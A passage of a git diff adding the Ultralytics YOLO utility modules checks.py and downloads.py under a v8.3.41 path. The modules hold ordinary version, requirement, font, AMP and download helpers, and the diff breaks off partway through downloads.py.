numpy as np +import requests +import torch + +from ultralytics.utils import ( + ASSETS, + AUTOINSTALL, + IS_COLAB, + IS_GIT_DIR, + IS_KAGGLE, + IS_PIP_PACKAGE, + LINUX, + LOGGER, + MACOS, + ONLINE, + PYTHON_VERSION, + ROOT, + TORCHVISION_VERSION, + USER_CONFIG_DIR, + WINDOWS, + Retry, + SimpleNamespace, + ThreadingLocked, + TryExcept, + clean_url, + colorstr, + downloads, + emojis, + is_github_action_running, + url2file, +) + + +def parse_requirements(file_path=ROOT.parent / "requirements.txt", package=""): + """ + Parse a requirements.txt file, ignoring lines that start with '#' and any text after '#'. + + Args: + file_path (Path): Path to the requirements.txt file. + package (str, optional): Python package to use instead of requirements.txt file, i.e. package='ultralytics'. + + Returns: + (List[Dict[str, str]]): List of parsed requirements as dictionaries with `name` and `specifier` keys. + + Example: + ```python + from ultralytics.utils.checks import parse_requirements + + parse_requirements(package="ultralytics") + ``` + """ + if package: + requires = [x for x in metadata.distribution(package).requires if "extra == " not in x] + else: + requires = Path(file_path).read_text().splitlines() + + requirements = [] + for line in requires: + line = line.strip() + if line and not line.startswith("#"): + line = line.split("#")[0].strip() # ignore inline comments + match = re.match(r"([a-zA-Z0-9-_]+)\s*([<>!=~]+.*)?", line) + if match: + requirements.append(SimpleNamespace(name=match[1], specifier=match[2].strip() if match[2] else "")) + + return requirements + + +def parse_version(version="0.0.0") -> tuple: + """ + Convert a version string to a tuple of integers, ignoring any extra non-numeric string attached to the version. This + function replaces deprecated 'pkg_resources.parse_version(v)'. + + Args: + version (str): Version string, i.e. '2.0.1+cpu' + + Returns: + (tuple): Tuple of integers representing the numeric part of the version and the extra string, i.e. (2, 0, 1) + """ + try: + return tuple(map(int, re.findall(r"\d+", version)[:3])) # '2.0.1+cpu' -> (2, 0, 1) + except Exception as e: + LOGGER.warning(f"WARNING ⚠️ failure for parse_version({version}), returning (0, 0, 0): {e}") + return 0, 0, 0 + + +def is_ascii(s) -> bool: + """ + Check if a string is composed of only ASCII characters. + + Args: + s (str): String to be checked. + + Returns: + (bool): True if the string is composed only of ASCII characters, False otherwise. + """ + # Convert list, tuple, None, etc. to string + s = str(s) + + # Check if the string is composed of only ASCII characters + return all(ord(c) < 128 for c in s) + + +def check_imgsz(imgsz, stride=32, min_dim=1, max_dim=2, floor=0): + """ + Verify image size is a multiple of the given stride in each dimension. If the image size is not a multiple of the + stride, update it to the nearest multiple of the stride that is greater than or equal to the given floor value. + + Args: + imgsz (int | cList[int]): Image size. + stride (int): Stride value. + min_dim (int): Minimum number of dimensions. + max_dim (int): Maximum number of dimensions. + floor (int): Minimum allowed value for image size. + + Returns: + (List[int]): Updated image size. + """ + # Convert stride to integer if it is a tensor + stride = int(stride.max() if isinstance(stride, torch.Tensor) else stride) + + # Convert image size to list if it is an integer + if isinstance(imgsz, int): + imgsz = [imgsz] + elif isinstance(imgsz, (list, tuple)): + imgsz = list(imgsz) + elif isinstance(imgsz, str): # i.e. '640' or '[640,640]' + imgsz = [int(imgsz)] if imgsz.isnumeric() else eval(imgsz) + else: + raise TypeError( + f"'imgsz={imgsz}' is of invalid type {type(imgsz).__name__}. " + f"Valid imgsz types are int i.e. 'imgsz=640' or list i.e. 'imgsz=[640,640]'" + ) + + # Apply max_dim + if len(imgsz) > max_dim: + msg = ( + "'train' and 'val' imgsz must be an integer, while 'predict' and 'export' imgsz may be a [h, w] list " + "or an integer, i.e. 'yolo export imgsz=640,480' or 'yolo export imgsz=640'" + ) + if max_dim != 1: + raise ValueError(f"imgsz={imgsz} is not a valid image size. {msg}") + LOGGER.warning(f"WARNING ⚠️ updating to 'imgsz={max(imgsz)}'. {msg}") + imgsz = [max(imgsz)] + # Make image size a multiple of the stride + sz = [max(math.ceil(x / stride) * stride, floor) for x in imgsz] + + # Print warning message if image size was updated + if sz != imgsz: + LOGGER.warning(f"WARNING ⚠️ imgsz={imgsz} must be multiple of max stride {stride}, updating to {sz}") + + # Add missing dimensions if necessary + sz = [sz[0], sz[0]] if min_dim == 2 and len(sz) == 1 else sz[0] if min_dim == 1 and len(sz) == 1 else sz + + return sz + + +def check_version( + current: str = "0.0.0", + required: str = "0.0.0", + name: str = "version", + hard: bool = False, + verbose: bool = False, + msg: str = "", +) -> bool: + """ + Check current version against the required version or range. + + Args: + current (str): Current version or package name to get version from. + required (str): Required version or range (in pip-style format). + name (str, optional): Name to be used in warning message. + hard (bool, optional): If True, raise an AssertionError if the requirement is not met. + verbose (bool, optional): If True, print warning message if requirement is not met. + msg (str, optional): Extra message to display if verbose. + + Returns: + (bool): True if requirement is met, False otherwise. + + Example: + ```python + # Check if current version is exactly 22.04 + check_version(current="22.04", required="==22.04") + + # Check if current version is greater than or equal to 22.04 + check_version(current="22.10", required="22.04") # assumes '>=' inequality if none passed + + # Check if current version is less than or equal to 22.04 + check_version(current="22.04", required="<=22.04") + + # Check if current version is between 20.04 (inclusive) and 22.04 (exclusive) + check_version(current="21.10", required=">20.04,<22.04") + ``` + """ + if not current: # if current is '' or None + LOGGER.warning(f"WARNING ⚠️ invalid check_version({current}, {required}) requested, please check values.") + return True + elif not current[0].isdigit(): # current is package name rather than version string, i.e. current='ultralytics' + try: + name = current # assigned package name to 'name' arg + current = metadata.version(current) # get version string from package name + except metadata.PackageNotFoundError as e: + if hard: + raise ModuleNotFoundError(emojis(f"WARNING ⚠️ {current} package is required but not installed")) from e + else: + return False + + if not required: # if required is '' or None + return True + + if "sys_platform" in required and ( # i.e. required='<2.4.0,>=1.8.0; sys_platform == "win32"' + (WINDOWS and "win32" not in required) + or (LINUX and "linux" not in required) + or (MACOS and "macos" not in required and "darwin" not in required) + ): + return True + + op = "" + version = "" + result = True + c = parse_version(current) # '1.2.3' -> (1, 2, 3) + for r in required.strip(",").split(","): + op, version = re.match(r"([^0-9]*)([\d.]+)", r).groups() # split '>=22.04' -> ('>=', '22.04') + if not op: + op = ">=" # assume >= if no op passed + v = parse_version(version) # '1.2.3' -> (1, 2, 3) + if op == "==" and c != v: + result = False + elif op == "!=" and c == v: + result = False + elif op == ">=" and not (c >= v): + result = False + elif op == "<=" and not (c <= v): + result = False + elif op == ">" and not (c > v): + result = False + elif op == "<" and not (c < v): + result = False + if not result: + warning = f"WARNING ⚠️ {name}{op}{version} is required, but {name}=={current} is currently installed {msg}" + if hard: + raise ModuleNotFoundError(emojis(warning)) # assert version requirements met + if verbose: + LOGGER.warning(warning) + return result + + +def check_latest_pypi_version(package_name="ultralytics"): + """ + Returns the latest version of a PyPI package without downloading or installing it. + + Args: + package_name (str): The name of the package to find the latest version for. + + Returns: + (str): The latest version of the package. + """ + try: + requests.packages.urllib3.disable_warnings() # Disable the InsecureRequestWarning + response = requests.get(f"https://pypi.org/pypi/{package_name}/json", timeout=3) + if response.status_code == 200: + return response.json()["info"]["version"] + except Exception: + return None + + +def check_pip_update_available(): + """ + Checks if a new version of the ultralytics package is available on PyPI. + + Returns: + (bool): True if an update is available, False otherwise. + """ + if ONLINE and IS_PIP_PACKAGE: + try: + from ultralytics import __version__ + + latest = check_latest_pypi_version() + if check_version(__version__, f"<{latest}"): # check if current version is < latest version + LOGGER.info( + f"New https://pypi.org/project/ultralytics/{latest} available 😃 " + f"Update with 'pip install -U ultralytics'" + ) + return True + except Exception: + pass + return False + + +@ThreadingLocked() +def check_font(font="Arial.ttf"): + """ + Find font locally or download to user's configuration directory if it does not already exist. + + Args: + font (str): Path or name of font. + + Returns: + file (Path): Resolved font file path. + """ + from matplotlib import font_manager + + # Check USER_CONFIG_DIR + name = Path(font).name + file = USER_CONFIG_DIR / name + if file.exists(): + return file + + # Check system fonts + matches = [s for s in font_manager.findSystemFonts() if font in s] + if any(matches): + return matches[0] + + # Download to USER_CONFIG_DIR if missing + url = f"https://github.com/ultralytics/assets/releases/download/v0.0.0/{name}" + if downloads.is_url(url, check=True): + downloads.safe_download(url=url, file=file) + return file + + +def check_python(minimum: str = "3.8.0", hard: bool = True, verbose: bool = False) -> bool: + """ + Check current python version against the required minimum version. + + Args: + minimum (str): Required minimum version of python. + hard (bool, optional): If True, raise an AssertionError if the requirement is not met. + verbose (bool, optional): If True, print warning message if requirement is not met. + + Returns: + (bool): Whether the installed Python version meets the minimum constraints. + """ + return check_version(PYTHON_VERSION, minimum, name="Python", hard=hard, verbose=verbose) + + +@TryExcept() +def check_requirements(requirements=ROOT.parent / "requirements.txt", exclude=(), install=True, cmds=""): + """ + Check if installed dependencies meet YOLOv8 requirements and attempt to auto-update if needed. + + Args: + requirements (Union[Path, str, List[str]]): Path to a requirements.txt file, a single package requirement as a + string, or a list of package requirements as strings. + exclude (Tuple[str]): Tuple of package names to exclude from checking. + install (bool): If True, attempt to auto-update packages that don't meet requirements. + cmds (str): Additional commands to pass to the pip install command when auto-updating. + + Example: + ```python + from ultralytics.utils.checks import check_requirements + + # Check a requirements.txt file + check_requirements("path/to/requirements.txt") + + # Check a single package + check_requirements("ultralytics>=8.0.0") + + # Check multiple packages + check_requirements(["numpy", "ultralytics>=8.0.0"]) + ``` + """ + prefix = colorstr("red", "bold", "requirements:") + if isinstance(requirements, Path): # requirements.txt file + file = requirements.resolve() + assert file.exists(), f"{prefix} {file} not found, check failed." + requirements = [f"{x.name}{x.specifier}" for x in parse_requirements(file) if x.name not in exclude] + elif isinstance(requirements, str): + requirements = [requirements] + + pkgs = [] + for r in requirements: + r_stripped = r.split("/")[-1].replace(".git", "") # replace git+https://org/repo.git -> 'repo' + match = re.match(r"([a-zA-Z0-9-_]+)([<>!=~]+.*)?", r_stripped) + name, required = match[1], match[2].strip() if match[2] else "" + try: + assert check_version(metadata.version(name), required) # exception if requirements not met + except (AssertionError, metadata.PackageNotFoundError): + pkgs.append(r) + + @Retry(times=2, delay=1) + def attempt_install(packages, commands): + """Attempt pip install command with retries on failure.""" + return subprocess.check_output(f"pip install --no-cache-dir {packages} {commands}", shell=True).decode() + + s = " ".join(f'"{x}"' for x in pkgs) # console string + if s: + if install and AUTOINSTALL: # check environment variable + n = len(pkgs) # number of packages updates + LOGGER.info(f"{prefix} Ultralytics requirement{'s' * (n > 1)} {pkgs} not found, attempting AutoUpdate...") + try: + t = time.time() + assert ONLINE, "AutoUpdate skipped (offline)" + LOGGER.info(attempt_install(s, cmds)) + dt = time.time() - t + LOGGER.info( + f"{prefix} AutoUpdate success ✅ {dt:.1f}s, installed {n} package{'s' * (n > 1)}: {pkgs}\n" + f"{prefix} ⚠️ {colorstr('bold', 'Restart runtime or rerun command for updates to take effect')}\n" + ) + except Exception as e: + LOGGER.warning(f"{prefix} ❌ {e}") + return False + else: + return False + + return True + + +def check_torchvision(): + """ + Checks the installed versions of PyTorch and Torchvision to ensure they're compatible. + + This function checks the installed versions of PyTorch and Torchvision, and warns if they're incompatible according + to the provided compatibility table based on: + https://github.com/pytorch/vision#installation. + + The compatibility table is a dictionary where the keys are PyTorch versions and the values are lists of compatible + Torchvision versions. + """ + # Compatibility table + compatibility_table = { + "2.4": ["0.19"], + "2.3": ["0.18"], + "2.2": ["0.17"], + "2.1": ["0.16"], + "2.0": ["0.15"], + "1.13": ["0.14"], + "1.12": ["0.13"], + } + + # Extract only the major and minor versions + v_torch = ".".join(torch.__version__.split("+")[0].split(".")[:2]) + if v_torch in compatibility_table: + compatible_versions = compatibility_table[v_torch] + v_torchvision = ".".join(TORCHVISION_VERSION.split("+")[0].split(".")[:2]) + if all(v_torchvision != v for v in compatible_versions): + print( + f"WARNING ⚠️ torchvision=={v_torchvision} is incompatible with torch=={v_torch}.\n" + f"Run 'pip install torchvision=={compatible_versions[0]}' to fix torchvision or " + "'pip install -U torch torchvision' to update both.\n" + "For a full compatibility table see https://github.com/pytorch/vision#installation" + ) + + +def check_suffix(file="yolo11n.pt", suffix=".pt", msg=""): + """Check file(s) for acceptable suffix.""" + if file and suffix: + if isinstance(suffix, str): + suffix = (suffix,) + for f in file if isinstance(file, (list, tuple)) else [file]: + s = Path(f).suffix.lower().strip() # file suffix + if len(s): + assert s in suffix, f"{msg}{f} acceptable suffix is {suffix}, not {s}" + + +def check_yolov5u_filename(file: str, verbose: bool = True): + """Replace legacy YOLOv5 filenames with updated YOLOv5u filenames.""" + if "yolov3" in file or "yolov5" in file: + if "u.yaml" in file: + file = file.replace("u.yaml", ".yaml") # i.e. yolov5nu.yaml -> yolov5n.yaml + elif ".pt" in file and "u" not in file: + original_file = file + file = re.sub(r"(.*yolov5([nsmlx]))\.pt", "\\1u.pt", file) # i.e. yolov5n.pt -> yolov5nu.pt + file = re.sub(r"(.*yolov5([nsmlx])6)\.pt", "\\1u.pt", file) # i.e. yolov5n6.pt -> yolov5n6u.pt + file = re.sub(r"(.*yolov3(|-tiny|-spp))\.pt", "\\1u.pt", file) # i.e. yolov3-spp.pt -> yolov3-sppu.pt + if file != original_file and verbose: + LOGGER.info( + f"PRO TIP 💡 Replace 'model={original_file}' with new 'model={file}'.\nYOLOv5 'u' models are " + f"trained with https://github.com/ultralytics/ultralytics and feature improved performance vs " + f"standard YOLOv5 models trained with https://github.com/ultralytics/yolov5.\n" + ) + return file + + +def check_model_file_from_stem(model="yolov8n"): + """Return a model filename from a valid model stem.""" + if model and not Path(model).suffix and Path(model).stem in downloads.GITHUB_ASSETS_STEMS: + return Path(model).with_suffix(".pt") # add suffix, i.e. yolov8n -> yolov8n.pt + else: + return model + + +def check_file(file, suffix="", download=True, download_dir=".", hard=True): + """Search/download file (if necessary) and return path.""" + check_suffix(file, suffix) # optional + file = str(file).strip() # convert to string and strip spaces + file = check_yolov5u_filename(file) # yolov5n -> yolov5nu + if ( + not file + or ("://" not in file and Path(file).exists()) # '://' check required in Windows Python<3.10 + or file.lower().startswith("grpc://") + ): # file exists or gRPC Triton images + return file + elif download and file.lower().startswith(("https://", "http://", "rtsp://", "rtmp://", "tcp://")): # download + url = file # warning: Pathlib turns :// -> :/ + file = Path(download_dir) / url2file(file) # '%2F' to '/', split https://url.com/file.txt?auth + if file.exists(): + LOGGER.info(f"Found {clean_url(url)} locally at {file}") # file already exists + else: + downloads.safe_download(url=url, file=file, unzip=False) + return str(file) + else: # search + files = glob.glob(str(ROOT / "**" / file), recursive=True) or glob.glob(str(ROOT.parent / file)) # find file + if not files and hard: + raise FileNotFoundError(f"'{file}' does not exist") + elif len(files) > 1 and hard: + raise FileNotFoundError(f"Multiple files match '{file}', specify exact path: {files}") + return files[0] if len(files) else [] # return file + + +def check_yaml(file, suffix=(".yaml", ".yml"), hard=True): + """Search/download YAML file (if necessary) and return path, checking suffix.""" + return check_file(file, suffix, hard=hard) + + +def check_is_path_safe(basedir, path): + """ + Check if the resolved path is under the intended directory to prevent path traversal. + + Args: + basedir (Path | str): The intended directory. + path (Path | str): The path to check. + + Returns: + (bool): True if the path is safe, False otherwise. + """ + base_dir_resolved = Path(basedir).resolve() + path_resolved = Path(path).resolve() + + return path_resolved.exists() and path_resolved.parts[: len(base_dir_resolved.parts)] == base_dir_resolved.parts + + +def check_imshow(warn=False): + """Check if environment supports image displays.""" + try: + if LINUX: + assert not IS_COLAB and not IS_KAGGLE + assert "DISPLAY" in os.environ, "The DISPLAY environment variable isn't set." + cv2.imshow("test", np.zeros((8, 8, 3), dtype=np.uint8)) # show a small 8-pixel image + cv2.waitKey(1) + cv2.destroyAllWindows() + cv2.waitKey(1) + return True + except Exception as e: + if warn: + LOGGER.warning(f"WARNING ⚠️ Environment does not support cv2.imshow() or PIL Image.show()\n{e}") + return False + + +def check_yolo(verbose=True, device=""): + """Return a human-readable YOLO software and hardware summary.""" + import psutil + + from ultralytics.utils.torch_utils import select_device + + if IS_COLAB: + shutil.rmtree("sample_data", ignore_errors=True) # remove colab /sample_data directory + + if verbose: + # System info + gib = 1 << 30 # bytes per GiB + ram = psutil.virtual_memory().total + total, used, free = shutil.disk_usage("/") + s = f"({os.cpu_count()} CPUs, {ram / gib:.1f} GB RAM, {(total - free) / gib:.1f}/{total / gib:.1f} GB disk)" + try: + from IPython import display + + display.clear_output() # clear display if notebook + except ImportError: + pass + else: + s = "" + + select_device(device=device, newline=False) + LOGGER.info(f"Setup complete ✅ {s}") + + +def collect_system_info(): + """Collect and print relevant system information including OS, Python, RAM, CPU, and CUDA.""" + import psutil + + from ultralytics.utils import ENVIRONMENT # scope to avoid circular import + from ultralytics.utils.torch_utils import get_cpu_info, get_gpu_info + + gib = 1 << 30 # bytes per GiB + cuda = torch and torch.cuda.is_available() + check_yolo() + total, used, free = shutil.disk_usage("/") + + info_dict = { + "OS": platform.platform(), + "Environment": ENVIRONMENT, + "Python": PYTHON_VERSION, + "Install": "git" if IS_GIT_DIR else "pip" if IS_PIP_PACKAGE else "other", + "RAM": f"{psutil.virtual_memory().total / gib:.2f} GB", + "Disk": f"{(total - free) / gib:.1f}/{total / gib:.1f} GB", + "CPU": get_cpu_info(), + "CPU count": os.cpu_count(), + "GPU": get_gpu_info(index=0) if cuda else None, + "GPU count": torch.cuda.device_count() if cuda else None, + "CUDA": torch.version.cuda if cuda else None, + } + LOGGER.info("\n" + "\n".join(f"{k:<20}{v}" for k, v in info_dict.items()) + "\n") + + package_info = {} + for r in parse_requirements(package="ultralytics"): + try: + current = metadata.version(r.name) + is_met = "✅ " if check_version(current, str(r.specifier), name=r.name, hard=True) else "❌ " + except metadata.PackageNotFoundError: + current = "(not installed)" + is_met = "❌ " + package_info[r.name] = f"{is_met}{current}{r.specifier}" + LOGGER.info(f"{r.name:<20}{package_info[r.name]}") + + info_dict["Package Info"] = package_info + + if is_github_action_running(): + github_info = { + "RUNNER_OS": os.getenv("RUNNER_OS"), + "GITHUB_EVENT_NAME": os.getenv("GITHUB_EVENT_NAME"), + "GITHUB_WORKFLOW": os.getenv("GITHUB_WORKFLOW"), + "GITHUB_ACTOR": os.getenv("GITHUB_ACTOR"), + "GITHUB_REPOSITORY": os.getenv("GITHUB_REPOSITORY"), + "GITHUB_REPOSITORY_OWNER": os.getenv("GITHUB_REPOSITORY_OWNER"), + } + LOGGER.info("\n" + "\n".join(f"{k}: {v}" for k, v in github_info.items())) + info_dict["GitHub Info"] = github_info + + return info_dict + + +def check_amp(model): + """ + Checks the PyTorch Automatic Mixed Precision (AMP) functionality of a YOLO11 model. If the checks fail, it means + there are anomalies with AMP on the system that may cause NaN losses or zero-mAP results, so AMP will be disabled + during training. + + Args: + model (nn.Module): A YOLO11 model instance. + + Example: + ```python + from ultralytics import YOLO + from ultralytics.utils.checks import check_amp + + model = YOLO("yolo11n.pt").model.cuda() + check_amp(model) + ``` + + Returns: + (bool): Returns True if the AMP functionality works correctly with YOLO11 model, else False. + """ + from ultralytics.utils.torch_utils import autocast + + device = next(model.parameters()).device # get model device + if device.type in {"cpu", "mps"}: + return False # AMP only used on CUDA devices + + def amp_allclose(m, im): + """All close FP32 vs AMP results.""" + batch = [im] * 8 + imgsz = max(256, int(model.stride.max() * 4)) # max stride P5-32 and P6-64 + a = m(batch, imgsz=imgsz, device=device, verbose=False)[0].boxes.data # FP32 inference + with autocast(enabled=True): + b = m(batch, imgsz=imgsz, device=device, verbose=False)[0].boxes.data # AMP inference + del m + return a.shape == b.shape and torch.allclose(a, b.float(), atol=0.5) # close to 0.5 absolute tolerance + + im = ASSETS / "bus.jpg" # image to check + prefix = colorstr("AMP: ") + LOGGER.info(f"{prefix}running Automatic Mixed Precision (AMP) checks...") + warning_msg = "Setting 'amp=True'. If you experience zero-mAP or NaN losses you can disable AMP with amp=False." + try: + from ultralytics import YOLO + + assert amp_allclose(YOLO("yolo11n.pt"), im) + LOGGER.info(f"{prefix}checks passed ✅") + except ConnectionError: + LOGGER.warning( + f"{prefix}checks skipped ⚠️. " f"Offline and unable to download YOLO11n for AMP checks. {warning_msg}" + ) + except (AttributeError, ModuleNotFoundError): + LOGGER.warning( + f"{prefix}checks skipped ⚠️. " + f"Unable to load YOLO11n for AMP checks due to possible Ultralytics package modifications. {warning_msg}" + ) + except AssertionError: + LOGGER.warning( + f"{prefix}checks failed ❌. Anomalies were detected with AMP on your system that may lead to " + f"NaN losses or zero-mAP results, so AMP will be disabled during training." + ) + return False + return True + + +def git_describe(path=ROOT): # path must be a directory + """Return human-readable git description, i.e. v5.0-5-g3e25f1e https://git-scm.com/docs/git-describe.""" + try: + return subprocess.check_output(f"git -C {path} describe --tags --long --always", shell=True).decode()[:-1] + except Exception: + return "" + + +def print_args(args: Optional[dict] = None, show_file=True, show_func=False): + """Print function arguments (optional args dict).""" + + def strip_auth(v): + """Clean longer Ultralytics HUB URLs by stripping potential authentication information.""" + return clean_url(v) if (isinstance(v, str) and v.startswith("http") and len(v) > 100) else v + + x = inspect.currentframe().f_back # previous frame + file, _, func, _, _ = inspect.getframeinfo(x) + if args is None: # get args automatically + args, _, _, frm = inspect.getargvalues(x) + args = {k: v for k, v in frm.items() if k in args} + try: + file = Path(file).resolve().relative_to(ROOT).with_suffix("") + except ValueError: + file = Path(file).stem + s = (f"{file}: " if show_file else "") + (f"{func}: " if show_func else "") + LOGGER.info(colorstr(s) + ", ".join(f"{k}={strip_auth(v)}" for k, v in args.items())) + + +def cuda_device_count() -> int: + """ + Get the number of NVIDIA GPUs available in the environment. + + Returns: + (int): The number of NVIDIA GPUs available. + """ + try: + # Run the nvidia-smi command and capture its output + output = subprocess.check_output( + ["nvidia-smi", "--query-gpu=count", "--format=csv,noheader,nounits"], encoding="utf-8" + ) + + # Take the first line and strip any leading/trailing white space + first_line = output.strip().split("\n")[0] + + return int(first_line) + except (subprocess.CalledProcessError, FileNotFoundError, ValueError): + # If the command fails, nvidia-smi is not found, or output is not an integer, assume no GPUs are available + return 0 + + +def cuda_is_available() -> bool: + """ + Check if CUDA is available in the environment. + + Returns: + (bool): True if one or more NVIDIA GPUs are available, False otherwise. + """ + return cuda_device_count() > 0 + + +# Run checks and define constants +check_python("3.8", hard=False, verbose=True) # check python version +check_torchvision() # check torch-torchvision compatibility +IS_PYTHON_MINIMUM_3_10 = check_python("3.10", hard=False) +IS_PYTHON_3_12 = PYTHON_VERSION.startswith("3.12") diff --git a/2024.ultralytics/v8.3.41/utils/downloads.py b/2024.ultralytics/v8.3.41/utils/downloads.py new file mode 100644 index 0000000..d92b2b2 --- /dev/null +++ b/2024.ultralytics/v8.3.41/utils/downloads.py @@ -0,0 +1,536 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import os +import re +import shutil +import subprocess +from itertools import repeat +from multiprocessing.pool import ThreadPool +from pathlib import Path +from urllib import parse, request + +import requests +import torch + +from ultralytics.utils import LOGGER, TQDM, checks, clean_url, emojis, is_online, url2file + +# Define Ultralytics GitHub assets maintained at https://github.com/ultralytics/assets +GITHUB_ASSETS_REPO = "ultralytics/assets" +GITHUB_ASSETS_NAMES = ( + [f"yolov8{k}{suffix}.pt" for k in "nsmlx" for suffix in ("", "-cls", "-seg", "-pose", "-obb", "-oiv7")] + + [f"yolo11{k}{suffix}.pt" for k in "nsmlx" for suffix in ("", "-cls", "-seg", "-pose", "-obb")] + + [f"yolov5{k}{resolution}u.pt" for k in "nsmlx" for resolution in ("", "6")] + + [f"yolov3{k}u.pt" for k in ("", "-spp", "-tiny")] + + [f"yolov8{k}-world.pt" for k in "smlx"] + + [f"yolov8{k}-worldv2.pt" for k in "smlx"] + + [f"yolov9{k}.pt" for k in "tsmce"] + + [f"yolov10{k}.pt" for k in "nsmblx"] + + [f"yolo_nas_{k}.pt" for k in "sml"] + + [f"sam_{k}.pt" for k in "bl"] + + [f"FastSAM-{k}.pt" for k in "sx"] + + [f"rtdetr-{k}.pt" for k in "lx"] + + ["mobile_sam.pt"] + + ["calibration_image_sample_data_20x128x128x3_float32.npy.zip"] +) +GITHUB_ASSETS_STEMS = [Path(k).stem for k in GITHUB_ASSETS_NAMES] + + +def is_url(url, check=False): + """ + Validates if the given string is a URL and optionally checks if the URL exists online. + + Args: + url (str): The string to be validated as a URL. + check (bool, optional): If True, performs an additional check to see if the URL exists online. + Defaults to False. + + Returns: + (bool): Returns True for a valid URL. If 'check' is True, also returns True if the URL exists online. + Returns False otherwise. + + Example: + ```python + valid = is_url("https://www.example.com") + ``` + """ + try: + url = str(url) + result = parse.urlparse(url) + assert all([result.scheme, result.netloc]) # check if is url + if check: + with request.urlopen(url) as response: + return response.getcode() == 200 # check if exists online + return True + except Exception: + return False + + +def delete_dsstore(path, files_to_delete=(".DS_Store", "__MACOSX")): + """ + Deletes all ".DS_store" files under a specified directory. + + Args: + path (str, optional): The directory path where the ".DS_store" files should be deleted. + files_to_delete (tuple): The files to be deleted. + + Example: + ```python + from ultralytics.utils.downloads import delete_dsstore + + delete_dsstore("path/to/dir") + ``` + + Note: + ".DS_store" files are created by the Apple operating system and contain metadata about folders and files. They + are hidden system files and can cause issues when transferring files between different operating systems. + """ + for file in files_to_delete: + matches = list(Path(path).rglob(file)) + LOGGER.info(f"Deleting {file} files: {matches}") + for f in matches: + f.unlink() + + +def zip_directory(directory, compress=True, exclude=(".DS_Store", "__MACOSX"), progress=True): + """ + Zips the contents of a directory, excluding files containing strings in the exclude list. The resulting zip file is + named after the directory and placed alongside it. + + Args: + directory (str | Path): The path to the directory to be zipped. + compress (bool): Whether to compress the files while zipping. Default is True. + exclude (tuple, optional): A tuple of filename strings to be excluded. Defaults to ('.DS_Store', '__MACOSX'). + progress (bool, optional): Whether to display a progress bar. Defaults to True. + + Returns: + (Path): The path to the resulting zip file. + + Example: + ```python + from ultralytics.utils.downloads import zip_directory + + file = zip_directory("path/to/dir") + ``` + """ + from zipfile import ZIP_DEFLATED, ZIP_STORED, ZipFile + + delete_dsstore(directory) + directory = Path(directory) + if not directory.is_dir(): + raise FileNotFoundError(f"Directory '{directory}' does not exist.") + + # Unzip with progress bar + files_to_zip = [f for f in directory.rglob("*") if f.is_file() and all(x not in f.name for x in exclude)] + zip_file = directory.with_suffix(".zip") + compression = ZIP_DEFLATED if compress else ZIP_STORED + with ZipFile(zip_file, "w", compression) as f: + for file in TQDM(files_to_zip, desc=f"Zipping {directory} to {zip_file}...", unit="file", disable=not progress): + f.write(file, file.relative_to(directory)) + + return zip_file # return path to zip file + + +def unzip_file(file, path=None, exclude=(".DS_Store", "__MACOSX"), exist_ok=False, progress=True): + """ + Unzips a *.zip file to the specified path, excluding files containing strings in the exclude list. + + If the zipfile does not contain a single top-level directory, the function will create a new + directory with the same name as the zipfile (without the extension) to extract its contents. + If a path is not provided, the function will use the parent directory of the zipfile as the default path. + + Args: + file (str): The path to the zipfile to be extracted. + path (str, optional): The path to extract the zipfile to. Defaults to None. + exclude (tuple, optional): A tuple of filename strings to be excluded. Defaults to ('.DS_Store', '__MACOSX'). + exist_ok (bool, optional): Whether to overwrite existing contents if they exist. Defaults to False. + progress (bool, optional): Whether to display a progress bar. Defaults to True. + + Raises: + BadZipFile: If the provided file does not exist or is not a valid zipfile. + + Returns: + (Path): The path to the directory where the zipfile was extracted. + + Example: + ```python + from ultralytics.utils.downloads import unzip_file + + dir = unzip_file("path/to/file.zip") + ``` + """ + from zipfile import BadZipFile, ZipFile, is_zipfile + + if not (Path(file).exists() and is_zipfile(file)): + raise BadZipFile(f"File '{file}' does not exist or is a bad zip file.") + if path is None: + path = Path(file).parent # default path + + # Unzip the file contents + with ZipFile(file) as zipObj: + files = [f for f in zipObj.namelist() if all(x not in f for x in exclude)] + top_level_dirs = {Path(f).parts[0] for f in files} + + # Decide to unzip directly or unzip into a directory + unzip_as_dir = len(top_level_dirs) == 1 # (len(files) > 1 and not files[0].endswith("/")) + if unzip_as_dir: + # Zip has 1 top-level directory + extract_path = path # i.e. ../datasets + path = Path(path) / list(top_level_dirs)[0] # i.e. extract coco8/ dir to ../datasets/ + else: + # Zip has multiple files at top level + path = extract_path = Path(path) / Path(file).stem # i.e. extract multiple files to ../datasets/coco8/ + + # Check if destination directory already exists and contains files + if path.exists() and any(path.iterdir()) and not exist_ok: + # If it exists and is not empty, return the path without unzipping + LOGGER.warning(f"WARNING ⚠️ Skipping {file} unzip as destination directory {path} is not empty.") + return path + + for f in TQDM(files, desc=f"Unzipping {file} to {Path(path).resolve()}...", unit="file", disable=not progress): + # Ensure the file is within the extract_path to avoid path traversal security vulnerability + if ".." in Path(f).parts: + LOGGER.warning(f"Potentially insecure file path: {f}, skipping extraction.") + continue + zipObj.extract(f, extract_path) + + return path # return unzip dir + + +def check_disk_space(url="https://ultralytics.com/assets/coco8.zip", path=Path.cwd(), sf=1.5, hard=True): + """ + Check if there is sufficient disk space to download and store a file. + + Args: + url (str, optional): The URL to the file. Defaults to 'https://ultralytics.com/assets/coco8.zip'. + path (str | Path, optional): The path or drive to check the available free space on. + sf (float, optional): Safety factor, the multiplier for the required free space. Defaults to 1.5. + hard (bool, optional): Whether to throw an error or not on insufficient disk space. Defaults to True. + + Returns: + (bool): True if there is sufficient disk space, False otherwise. + """ + try: + r = requests.head(url) # response + assert r.status_code < 400, f"URL error for {url}: {r.status_code} {r.reason}" # check response + except Exception: + return True # requests issue, default to True + + # Check file size + gib = 1 << 30 # bytes per GiB + data = int(r.headers.get("Content-Length", 0)) / gib # file size (GB) + total, used, free = (x / gib for x in shutil.disk_usage(path)) # bytes + + if data * sf < free: + return True # sufficient space + + # Insufficient space + text = ( + f"WARNING ⚠️ Insufficient free disk space {free:.1f} GB < {data * sf:.3f} GB required, " + f"Please free {data * sf - free:.1f} GB additional disk space and try again." + ) + if hard: + raise MemoryError(text) + LOGGER.warning(text) + return False + + +def get_google_drive_file_info(link): + """ + Retrieves the direct download link and filename for a shareable Google Drive file link. + + Args: + link (str): The shareable link of the Google Drive file. + + Returns: + (str): Direct download URL for the Google Drive file. + (str): Original filename of the Google Drive file. If filename extraction fails, returns None. + + Example: + ```python + from ultralytics.utils.downloads import get_google_drive_file_info + + link = 